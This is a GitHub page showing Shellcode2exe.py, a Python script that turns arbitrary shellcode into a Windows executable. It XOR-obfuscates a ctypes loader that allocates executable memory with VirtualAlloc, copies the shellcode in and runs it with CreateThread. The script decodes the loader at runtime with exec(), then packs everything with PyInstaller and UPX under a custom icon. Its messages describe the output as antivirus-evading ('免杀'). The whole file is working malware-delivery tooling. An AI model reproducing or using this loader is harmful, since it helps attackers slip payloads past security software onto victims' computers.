-
Notifications
You must be signed in to change notification settings - Fork 17
/
Copy pathShellcode2exe.py
149 lines (103 loc) · 4.41 KB
/
Shellcode2exe.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
import subprocess
import random
import string
import shutil
import os
pyname = "shellcode.py"
def get_random_keys():
length = 8
table = string.ascii_letters + string.digits
keys = ''
for i in range(length):
keys += table[random.randint(0,len(table)-1)]
return keys
"""
def payload_decode(funcs,keys):
func_codes = ''
random.seed(keys)
func_code = funcs.split(',')
for item in func_code:
item = int(item)
func_codes += chr(item ^ random.randint(0, 255))
return func_codes
"""
def payload_encode(payload,keys):
random.seed(keys)
funcs = ""
for item in payload:
funcs += str(ord(item) ^ random.randint(0, 255)) + ','
funcs = funcs.strip(',')
return funcs
def code_x32_x64(arch,keys,funcs,shellcode):
# 编写执行脚本并写入文件
code = f"""import ctypes
import random
def payload_decode(funcs,keys):
func_codes = ''
random.seed(keys)
func_code = funcs.split(',')
for item in func_code:
item = int(item)
func_codes += chr(item ^ random.randint(0, 255))
return func_codes
def run_{arch}(shellcode):
funcs = "{funcs}"
func = payload_decode(funcs,"{keys}")
exec(func)
shellcode = {shellcode}
run_{arch}(shellcode)
"""
open(pyname,'w',encoding='utf-8').write(code)
def clean_output():
shutil.rmtree('output/')
os.mkdir('output/')
print('[+] 清理输出文件成功')
def py2exe(name,icon='exeLogo.ico'):
# 使用Pyinstaller转换python文件为exe
cmd = f"pyinstaller -F -w {pyname} --distpath output --specpath tempdir --workpath tempdir --clean -y --upx-dir upx-4.0.1"
if icon != None and os.path.exists(icon):
icon = os.path.abspath(icon)
cmd += f" --icon {icon}"
print('[*] Cmdline:',cmd)
try:
subprocess.call(cmd,shell=True)
except Exception as e:
print(f'{e}\n[-] 请检查 pyinstaller 是否安装')
exit()
try:
file = f"output/{pyname.split('.')[0]}.exe"
newfile = f"output/{name}.exe"
if os.path.exists(file):
print('========================')
os.remove(pyname)
shutil.rmtree('tempdir/')
print('[*] 文件清理完毕')
shutil.move(file,newfile)
print(f'[+] exe生成完毕 → {newfile} 已将文件复制至剪切板!')
subprocess.Popen(args=['powershell',f'Get-Item {newfile} | Set-Clipboard'])
except Exception as e:
print(f'[*] Something went wrong\n{e}')
exit()
def create_payload(arch,shellcode,icon=None):
"""
32位的payload
"""
payload_32 = 'shellcode = bytearray(shellcode);rwxpage = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40));buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode);ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(rwxpage),buf,ctypes.c_int(len(shellcode)));ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(rwxpage),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))),ctypes.c_int(-1))'
"""
64位的payload
"""
payload_64 = 'ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64;rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40);ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage), ctypes.create_string_buffer(shellcode), len(shellcode));ctypes.windll.kernel32.WaitForSingleObject(ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(rwxpage), 0, 0, 0), -1)'
keys = get_random_keys()
if arch == 32:
funcs = payload_encode(payload_32,keys)
elif arch == 64:
funcs = payload_encode(payload_64,keys)
code_x32_x64(arch,keys,funcs,shellcode)
print('参数信息:')
print(f'[+] Cipher: {funcs}\n[+] Keys: {keys}\n\n========================')
print('注意:生成的exe的操作系统是根据当前运行脚本的电脑操作系统所决定,生成32位的shellcode注意要用32位的电脑运行。\n[*] Convert shellcode.py to exe......\n免杀制作完成,转换exe中\n')
if icon:
py2exe(keys,icon)
else:
py2exe(keys)
print('Convert successfully!')